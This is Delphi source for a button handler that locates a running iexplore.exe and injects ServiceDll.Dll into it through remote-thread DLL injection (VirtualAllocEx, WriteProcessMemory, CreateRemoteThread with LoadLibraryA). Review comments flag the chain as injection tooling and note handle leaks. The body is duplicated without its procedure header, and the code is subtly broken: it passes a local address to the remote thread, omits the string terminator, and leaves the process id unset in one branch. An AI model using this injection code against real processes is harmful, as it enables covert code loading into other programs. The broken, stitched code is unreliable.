// Button handler: locates a running iexplore.exe through a Toolhelp32 process
// snapshot, then performs the classic DLL-injection sequence
// OpenProcess -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread
// with kernel32!LoadLibraryA as the thread start routine, so that
// ServiceDll.Dll (taken from the current directory) is loaded in the target.
// NOTE(review): this exact API chain is what endpoint telemetry for
// remote-thread creation and cross-process memory writes is designed to
// surface; a binary carrying it should be triaged as injection tooling.
// NOTE(review): hRemoteProcess is never handed to CloseHandle and the
// OpenProcess result is not validated before VirtualAllocEx uses it; the
// early Exit paths after the snapshot is taken also leave hProcessSnap open.
procedure TFrmMain.Button2Click(Sender: TObject);
var
pe32 : TProcessEntry32;
dwRemoteProcessId,kernelDll : HWND; // declared as HWND although they hold a process id and a module handle
hProcessSnap,hRemoteProcess,hRemoteThread1,RemoteThreadId : THandle;
te :AnsiString;
pszLibFileName : string;
pszLibFileRemote ,fnStartAddr: Pointer;
cb : integer;
NumberOfBytes : DWORD;
b : Boolean; // true once an iexplore.exe entry has been seen in the snapshot
begin
b:=false;
hProcessSnap := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if hProcessSnap = -1 then // INVALID_HANDLE_VALUE
begin
ShowMessage('创建"CreateToolhelp32Snapshot"出错!');
Exit;
end;
pe32.dwSize := SizeOf(TProcessEntry32);
if Process32First(hProcessSnap,pe32) then
begin
te := pe32.szExeFile;
// Match on either spelling of the image name (Pos is case-sensitive).
if (Pos('iexplore.exe',te)=0) and (Pos('IEXPLORE.EXE',te)=0) then
begin
// First entry did not match: walk the rest of the snapshot and stop at
// the first iexplore.exe, remembering its process id.
while Process32Next(hProcessSnap,pe32) do
begin
te := pe32.szExeFile;
if (Pos('iexplore.exe',te)>0) or (Pos('IEXPLORE.EXE',te)>0) then
begin
dwRemoteProcessId := pe32.th32ProcessID;
b:=true;
break;
end;
end;
end else
begin
// First entry already matched; only the flag is set in this branch.
b:=true;
end;
end;
if not b then
begin
showmessage('未找到IEXPLORE.EXE进程!');
Exit;
end;
// Access rights requested are exactly those needed for the write + remote
// thread below; handle is not checked and is never closed.
hRemoteProcess:=OpenProcess(PROCESS_CREATE_THREAD or PROCESS_VM_OPERATION or PROCESS_VM_WRITE,FALSE,dwRemoteProcessId);
pszLibFileName:= GetCurrentDir+'/'+'ServiceDll.Dll';
if Not FileExists(pszLibFileName) then
begin
showmessage('Dll文件不存在!');
Exit;
end;
// cb := (1+Length(pszLibFileName)) * SizeOf(Char);// compute DLL file-name length (earlier variant, with terminator)
cb := (Length(pszLibFileName)) * SizeOf(Char);// compute DLL file-name length
// Reserve cb bytes of read/write memory in the target for the path.
pszLibFileRemote := VirtualAllocEx(hRemoteProcess,nil,cb,MEM_COMMIT,PAGE_READWRITE);
// Copy cb bytes starting at @pszLibFileName into the remote buffer.
if Not WriteProcessMemory(hRemoteProcess,
pszLibFileRemote,
@pszLibFileName,
cb,
NumberOfBytes) then
begin
Showmessage('写入内存出错!');
Exit;
end;
// LoadLibraryA lives at the same address in every process because
// kernel32 is mapped at a common base, so the local address is reused.
kernelDll := GetModuleHandle('kernel32.dll');
fnStartAddr := GetProcAddress(kernelDll,'LoadLibraryA');
// Start LoadLibraryA in the target; @pszLibFileName is passed as the
// thread parameter. The thread's exit code is not inspected.
hRemoteThread1 := CreateRemoteThread(hRemoteProcess,
nil,
0,
fnStartAddr,
@pszLibFileName,
0,
RemoteThreadId);
if(hRemoteThread1 <> 0) then
CloseHandle(hRemoteThread1);// close the remote thread handle
if(hProcessSnap <> 0 ) then
CloseHandle(hProcessSnap);// close the process snapshot
end;
// Verbatim repeat of the Button2Click body above; the `procedure` header
// line is missing from this copy, so it is not compilable on its own.
// Behaviour: find a running iexplore.exe via Toolhelp32, then
// OpenProcess -> VirtualAllocEx -> WriteProcessMemory ->
// CreateRemoteThread(LoadLibraryA) to load ServiceDll.Dll from the current
// directory into it.
// NOTE(review): this API chain is the canonical signal for remote-thread
// injection in endpoint telemetry; triage any binary carrying it as
// injection tooling.
// NOTE(review): hRemoteProcess is never closed and its OpenProcess result is
// not validated; the early Exit paths after the snapshot leave hProcessSnap open.
var
pe32 : TProcessEntry32;
dwRemoteProcessId,kernelDll : HWND; // declared as HWND although they hold a process id and a module handle
hProcessSnap,hRemoteProcess,hRemoteThread1,RemoteThreadId : THandle;
te :AnsiString;
pszLibFileName : string;
pszLibFileRemote ,fnStartAddr: Pointer;
cb : integer;
NumberOfBytes : DWORD;
b : Boolean; // true once an iexplore.exe entry has been seen in the snapshot
begin
b:=false;
hProcessSnap := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if hProcessSnap = -1 then // INVALID_HANDLE_VALUE
begin
ShowMessage('创建"CreateToolhelp32Snapshot"出错!');
Exit;
end;
pe32.dwSize := SizeOf(TProcessEntry32);
if Process32First(hProcessSnap,pe32) then
begin
te := pe32.szExeFile;
// Match on either spelling of the image name (Pos is case-sensitive).
if (Pos('iexplore.exe',te)=0) and (Pos('IEXPLORE.EXE',te)=0) then
begin
// First entry did not match: walk the rest of the snapshot and stop at
// the first iexplore.exe, remembering its process id.
while Process32Next(hProcessSnap,pe32) do
begin
te := pe32.szExeFile;
if (Pos('iexplore.exe',te)>0) or (Pos('IEXPLORE.EXE',te)>0) then
begin
dwRemoteProcessId := pe32.th32ProcessID;
b:=true;
break;
end;
end;
end else
begin
// First entry already matched; only the flag is set in this branch.
b:=true;
end;
end;
if not b then
begin
showmessage('未找到IEXPLORE.EXE进程!');
Exit;
end;
// Access rights requested are exactly those needed for the write + remote
// thread below; handle is not checked and is never closed.
hRemoteProcess:=OpenProcess(PROCESS_CREATE_THREAD or PROCESS_VM_OPERATION or PROCESS_VM_WRITE,FALSE,dwRemoteProcessId);
pszLibFileName:= GetCurrentDir+'/'+'ServiceDll.Dll';
if Not FileExists(pszLibFileName) then
begin
showmessage('Dll文件不存在!');
Exit;
end;
// cb := (1+Length(pszLibFileName)) * SizeOf(Char);// compute DLL file-name length (earlier variant, with terminator)
cb := (Length(pszLibFileName)) * SizeOf(Char);// compute DLL file-name length
// Reserve cb bytes of read/write memory in the target for the path.
pszLibFileRemote := VirtualAllocEx(hRemoteProcess,nil,cb,MEM_COMMIT,PAGE_READWRITE);
// Copy cb bytes starting at @pszLibFileName into the remote buffer.
if Not WriteProcessMemory(hRemoteProcess,
pszLibFileRemote,
@pszLibFileName,
cb,
NumberOfBytes) then
begin
Showmessage('写入内存出错!');
Exit;
end;
// LoadLibraryA lives at the same address in every process because
// kernel32 is mapped at a common base, so the local address is reused.
kernelDll := GetModuleHandle('kernel32.dll');
fnStartAddr := GetProcAddress(kernelDll,'LoadLibraryA');
// Start LoadLibraryA in the target; @pszLibFileName is passed as the
// thread parameter. The thread's exit code is not inspected.
hRemoteThread1 := CreateRemoteThread(hRemoteProcess,
nil,
0,
fnStartAddr,
@pszLibFileName,
0,
RemoteThreadId);
if(hRemoteThread1 <> 0) then
CloseHandle(hRemoteThread1);// close the remote thread handle
if(hProcessSnap <> 0 ) then
CloseHandle(hProcessSnap);// close the process snapshot
end;